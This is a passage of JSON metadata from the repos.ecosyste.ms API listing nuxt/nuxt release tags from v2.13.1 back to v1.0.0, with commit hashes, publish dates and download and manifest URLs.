s/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifes